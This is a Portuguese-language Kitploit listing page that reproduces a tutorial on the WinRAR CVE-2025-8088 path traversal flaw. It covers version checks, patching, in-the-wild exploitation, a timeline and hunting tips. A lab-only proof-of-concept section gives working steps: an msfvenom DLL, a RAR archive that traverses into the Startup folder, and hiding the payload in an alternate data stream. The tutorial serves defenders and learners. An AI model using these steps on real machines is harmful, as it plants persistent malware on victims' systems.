Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal — Um tutorial envolvente sobre a descoberta, correção e proteção do WinRAR CVE-2025-8088 com um toque hacker prático. | Kitploit
Ferramentas/GitHubGitHub/adityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise ForenseAnálise de MalwareTestes de PenetraçãoInteligência de AmeaçasAprendizado e EducaçãoResposta a Incidentes
GitHubadityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal

CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

Um tutorial envolvente sobre a descoberta, correção e proteção do WinRAR CVE-2025-8088 com um toque hacker prático.

Ver Repositório
1225há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8088: Path Traversal de Dia Zero do WinRAR — Do Zero ao Pwn 🗿


Introdução – O “Velho Amigo” Acabou de Ser Flagrado

WinRAR — o clássico empoeirado que todo mundo tem instalado mas ninguém atualiza — acabou de levar um path traversal de dia zero de alta severidade: CVE-2025-8088.

  • Severidade: CVSS v3.1 → 8.8 (Alta)
  • Explorado ativamente por atores de ameaças como RomCom (Storm-0978) e Paper Werewolf.
  • Corrigido na versão: WinRAR 7.13 (lançada em 30 de julho de 2025).
  • Se você está na 7.12 ou inferior — é um alvo fácil.

A CISA até colocou isso no catálogo de Vulnerabilidades Conhecidas Exploradas, com prazo de remediação até 2 de setembro de 2025. Isso não é teoria — é fogo real.

Cover


Qual é o Bug? 🧩

  • Tipo: Path Traversal (directory traversal)
  • Diferença: Usa Fluxos de Dados Alternativos (ADS) para esconder payloads
  • Impacto: Arquivos RAR maliciosos podem extrair conteúdo fora da pasta pretendida — pense em: ..\Startup\evil.dll
  • Resultado: Colocação arbitrária de arquivos → persistência → backdoor → cidade RAT.

Afetada: WinRAR para Windows (≤7.12), UnRAR.dll, Portable UnRAR Seguro: Compilações Linux, Unix, Android.


Primeiro — Você Está Vulnerável? 🕵️‍♂️

Antes de entrar em pânico ou tentar ser hacker, verifique sua versão.

Como Verificar:

  • GUI: Abra o WinRAR → Ajuda → Sobre o WinRAR
  • CMD/Powershell:
root@kitploit:~
winget list WinRAR

(ou execute winrar.exe a partir do diretório de instalação)

  • Verificação da DLL: Clique com o botão direito em UnRAR.dll → Propriedades → Detalhes.

Quando comecei a escrever isso, eu estava na 7.10 — sim, bem vulnerável 🗿🐔🍗.

WinRAR_Version


Como Corrigir (Antes Que Alguém Corrija Você) 🛡️

  1. Baixe a versão mais recente de: rarlab.com/download.htm
  2. Escolha 64 bits ou 32 bits conforme seu sistema.
  3. Execute o instalador — ele sobrescreverá sua versão antiga.
  4. Verifique: Ajuda → Sobre o WinRAR → deve mostrar 7.13 ou superior.
  5. Substitua UnRAR.dll em ferramentas dependentes, se houver.

WinRAR não atualiza automaticamente — coloque um lembrete no calendário, não vire um alvo estático.

WinRAR_Version_Updated

PS: Ignora a ostentação do meu wallpaper aqui — tinha que mostrar um pouco! 😏


Exploração Ativa no Mundo Real ⚔️

  • RomCom (Storm-0978): Phishing com iscas de candidatura a emprego, alvos relacionados à Ucrânia.
  • Paper Werewolf: Entrou em cena logo depois, mirando organizações russas.
  • Payloads entregues: SnipBot, RustyClaw, variantes do Mythic Agent.
  • DLLs/LNK maliciosos colocados em %TEMP% e pastas de Inicialização.
  • CISA listou em 12 de agosto de 2025 → prazo: 2 de setembro de 2025.

Prova de Conceito (PoC) – Apenas em Laboratório Controlado! 🧨

⚠ Aviso: Isso é apenas para testes de segurança educacionais e autorizados. Não vire um gremlin 🗿.

Passo 1: Gerar uma DLL Maliciosa

root@kitploit:~
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll

Passo 2: Criar um RAR com Path Traversal

root@kitploit:~
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll

Passo 3: (Opcional) Furtividade com ADS

root@kitploit:~
type evil.dll > legit.txt:evil.dll

Passo 4: Extrair com WinRAR Vulnerável

Boom — evil.dll vai parar na Inicialização. Próximo reboot? Olá calc.exe.

Workflow


Mitigação e Busca 🐺

  • Corrigir → WinRAR 7.13+

  • Procure por .dll ou .lnk suspeitos em:

    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    • %TEMP%
  • Monitore ADS:

    root@kitploit:~
    streams.exe -s C:\
    
  • Regra IDS/IPS: marcar RAR com sequências ..\.

  • Plugins Nessus/Qualys já disponíveis.


Linha do Tempo Principal

  • 18 de julho de 2025 – ESET descobre exploração ativa
  • 30 de julho de 2025 – Correção lançada (7.13)
  • 12 de agosto de 2025 – Adicionado ao Catálogo KEV da CISA
  • 2 de setembro de 2025 – Prazo obrigatório de remediação para agências federais

Palavras Finais – Corrija ou Pereça 🗿

Isso não foi uma vulnerabilidade “talvez um dia” — foi armada antes da divulgação. Se você ainda está na 7.10 (como eu estava quando escrevi isso), corrija agora. Se você está no lado da equipe vermelha, trate isso como um estudo de caso de como ferramentas antigas se tornam novos vetores de ataque.


Baixar ferramenta